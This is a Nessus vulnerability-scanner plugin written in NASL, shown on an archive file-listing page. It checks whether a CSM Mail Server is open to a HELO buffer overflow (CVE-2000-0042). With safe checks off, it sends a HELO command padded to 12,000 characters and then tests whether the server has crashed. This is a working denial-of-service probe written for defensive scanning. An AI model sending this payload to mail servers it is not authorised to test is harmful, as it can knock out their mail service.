home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / csm_helo.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  2.8 KB  |  113 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10050);
  10.  script_bugtraq_id(895);
  11.  script_version ("$Revision: 1.21 $");
  12.  script_cve_id("CVE-2000-0042");
  13.  name["english"] = "CSM Mail server MTA 'HELO' denial";
  14.  name["francais"] = "DΘni de service 'HELO' contre le MTA CSM Mail server";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. There might be a buffer overflow when this MTA is issued the 'HELO' command
  19. issued by a too long argument (12,000 chars)
  20.  
  21. This problem may allow an attacker to execute arbitrary code on this computer,
  22. or to disable your ability to send or receive emails.
  23.  
  24. Solution : contact your vendor for a patch.
  25. Risk factor : High";
  26.  
  27.  
  28.  
  29.  script_description(english:desc["english"]);
  30.  
  31.  summary["english"] = "Overflows the remote SMTP server";
  32.  summary["francais"] = "Overflow le serveur SMTP distant";
  33.  script_summary(english:summary["english"], francais:summary["francais"]);
  34.  
  35.  script_category(ACT_MIXED_ATTACK); # mixed
  36.  
  37.  
  38.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  39.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  40.  family["english"] = "SMTP problems";
  41.  family["francais"] = "ProblΦmes SMTP";
  42.  script_family(english:family["english"], francais:family["francais"]);
  43.  script_dependencie("find_service.nes", "smtpserver_detect.nasl", "slmail_helo.nasl");
  44.  script_exclude_keys("SMTP/wrapped","SMTP/3comnbx", "SMTP/postfix");
  45.  script_require_ports("Services/smtp", 25);
  46.  exit(0);
  47. }
  48.  
  49. #
  50. # The script code starts here
  51. #
  52.  
  53. include("smtp_func.inc");
  54.  
  55. port = get_kb_item("Services/smtp");
  56. if(!port)port = 25;
  57.  
  58. if(get_kb_item("SMTP/3comnbx"))exit(0);
  59.  
  60. if(safe_checks())
  61. {
  62.  banner = get_smtp_banner(port:port);
  63.  if(banner)
  64.  {
  65.   if(egrep(string:banner,
  66.         pattern:"^220 SMTP CSM Mail Server ready at .* .Version 2000.0[1-8].A"))
  67.     {
  68.     alrt = "
  69. The remote CSM SMTP server may be vulnerable
  70. to a buffer overflow allowing anyone to
  71. execute arbitrary commands on this host.
  72.  
  73. *** Nessus reports this vulnerability using only
  74. *** information that was gathered. Use caution
  75. *** when testing without safe checks enabled.
  76.  
  77. Solution : upgrade to the latest version
  78. Risk factor : High";
  79.      security_hole(port:port, data:alrt);
  80.     }  
  81.  } 
  82.  exit(0);
  83. }
  84.  
  85.  
  86. if(get_port_state(port))
  87. {
  88.  key = get_kb_item(string("SMTP/", port, "/helo_overflow"));
  89.  if(key)exit(0);
  90.  soc = open_sock_tcp(port);
  91.  if(soc)
  92.  {
  93.   s = smtp_recv_banner(socket:soc);
  94.   if(!("220 " >< s)){
  95.       close(soc);
  96.     exit(0);
  97.     }
  98.   c = string("HELO ", crap(12000), "\r\n");
  99.   send(socket:soc, data:c);
  100.   s = recv_line(socket:soc, length:1024);
  101.   if(!s)
  102.   {
  103.    close(soc);
  104.    soc = open_sock_tcp(port);
  105.    if(soc) s = smtp_recv_banner(socket:soc);
  106.    else s = NULL;
  107.  
  108.    if(!s) security_hole(port);
  109.    close(soc);
  110.  }
  111. }
  112. }
  113.